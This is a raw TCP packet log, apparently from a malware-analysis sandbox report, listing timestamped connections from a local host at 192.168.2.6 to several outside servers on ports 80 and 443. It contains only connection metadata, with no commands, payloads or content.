Feb 9, 2021 18:41:50.689584970 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689593077 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689645052 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689651966 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689682007 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689701080 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689702034 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689718962 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.689728975 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689754009 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.689773083 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690280914 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690299988 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690311909 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690330029 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690341949 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690346003 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690361977 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690381050 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690428019 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690462112 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690485954 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690502882 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690534115 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690546036 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690557003 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690598965 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690599918 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690615892 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690660000 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690666914 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690685034 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690725088 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690757036 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690787077 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690805912 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690834045 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690850973 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690859079 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690897942 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.690947056 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690968037 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690984964 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.690999031 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691009045 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691028118 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691061974 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691111088 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691158056 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691168070 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691203117 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691214085 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691221952 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691246986 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691270113 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691324949 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691342115 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691356897 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691369057 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691374063 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:50.691391945 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:50.691417933 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:51.377464056 CET	49728	443	192.168.2.6	192.185.16.102
Feb 9, 2021 18:41:51.536137104 CET	443	49728	192.185.16.102	192.168.2.6
Feb 9, 2021 18:41:53.790139914 CET	80	49727	139.162.190.91	192.168.2.6
Feb 9, 2021 18:41:53.790378094 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:30.289324999 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:30.600117922 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:31.287714958 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:32.490892887 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:34.897404909 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:39.710294962 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:49.320517063 CET	49727	80	192.168.2.6	139.162.190.91
Feb 9, 2021 18:43:59.801742077 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:43:59.802072048 CET	49756	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:43:59.876395941 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:43:59.876455069 CET	80	49756	35.228.31.40	192.168.2.6
Feb 9, 2021 18:43:59.876687050 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:43:59.877289057 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:43:59.877291918 CET	49756	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:43:59.995340109 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279098034 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279128075 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279177904 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279195070 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279210091 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279227018 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.279257059 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.279319048 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.318919897 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.318947077 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.318964958 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.318980932 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.319068909 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.355074883 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355103016 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355113983 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355125904 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355144978 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355158091 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355170012 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355190039 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355189085 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.355206013 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.355245113 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.355267048 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.358701944 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.358726025 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.358829021 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.358864069 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.360954046 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.363500118 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.395350933 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395378113 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395395994 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395416021 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395431995 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395450115 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395462036 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395474911 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.395591974 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.395616055 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.429625034 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429657936 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429676056 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429692030 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429709911 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429727077 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429744005 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429759979 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429773092 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.429775000 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429795027 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429795980 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.429814100 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429826021 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.429830074 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429842949 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429852962 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.429852962 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.429877043 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.429953098 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.439156055 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439188004 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439208031 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439224005 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439244032 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439254045 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.439260006 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439274073 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.439276934 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439292908 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439308882 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.439384937 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.439394951 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.452610016 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.452769041 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.469965935 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.469995975 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470014095 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470030069 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470046997 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470062017 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.470063925 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470082045 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470098972 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470109940 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.470113993 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.470130920 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.470159054 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.504287958 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504314899 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504331112 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504345894 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504359007 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504374981 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504388094 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504403114 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504414082 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.504422903 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504437923 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.504441023 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504456997 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504465103 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.504472971 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504486084 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.504498005 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.504529953 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.518779993 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518805027 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518821001 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518836975 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518836975 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.518852949 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518866062 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.518872976 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518891096 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518906116 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518913984 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.518923044 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518939018 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.518939972 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518954992 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518965006 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.518970966 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.518991947 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.519022942 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.520970106 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.520992994 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.521011114 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.521025896 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.521087885 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.521152973 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.521210909 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.527089119 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.527802944 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.544377089 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.545713902 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.559632063 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559659958 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559678078 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559694052 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559710979 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559730053 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559747934 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559762955 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559778929 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559783936 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.559794903 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559809923 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559822083 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.559827089 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.559844971 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.559871912 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.563621044 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.563643932 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.563673973 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.563708067 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.563716888 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.563770056 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.563781023 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.563878059 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.566349983 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.572937965 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.575613022 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.580866098 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.583615065 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.600997925 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601057053 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601078033 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601097107 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601111889 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601130009 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601147890 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601162910 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601175070 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601178885 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.601191044 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601210117 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601227045 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.601241112 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.601279974 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.607408047 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.607439995 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.607451916 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.607465982 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.607609034 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.607644081 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.607758045 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.621965885 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.622042894 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.641851902 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.641891003 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.641913891 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.641931057 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.641936064 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.641957998 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.641957998 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.641983032 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642009974 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642018080 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.642034054 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642041922 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.642056942 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642072916 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.642081976 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642103910 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642110109 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.642127037 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.642139912 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.642168045 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.643564939 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643599033 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643621922 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643631935 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.643644094 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643662930 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643682003 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643687963 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.643702984 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.643711090 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.643739939 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.643769026 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.650033951 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.650228024 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.655134916 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.655164957 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.655213118 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.655234098 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.655287027 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.655303955 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.655349970 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.675024986 CET	49755	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.751327991 CET	80	49755	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.765930891 CET	49756	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.867918015 CET	80	49756	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:00.868006945 CET	49756	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.869050980 CET	49756	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:00.944614887 CET	80	49756	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.181401968 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.181454897 CET	49758	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.255747080 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.255863905 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.256082058 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.258430958 CET	80	49758	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.258578062 CET	49758	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.375411034 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714838982 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714873075 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714900017 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714922905 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714943886 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714966059 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.714966059 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.715025902 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.715029001 CET	49757	80	192.168.2.6	35.228.31.40
Feb 9, 2021 18:44:02.753659964 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.753686905 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.753699064 CET	80	49757	35.228.31.40	192.168.2.6
Feb 9, 2021 18:44:02.753719091 CET	80	49757	35.228.31.40	192.168.2.6
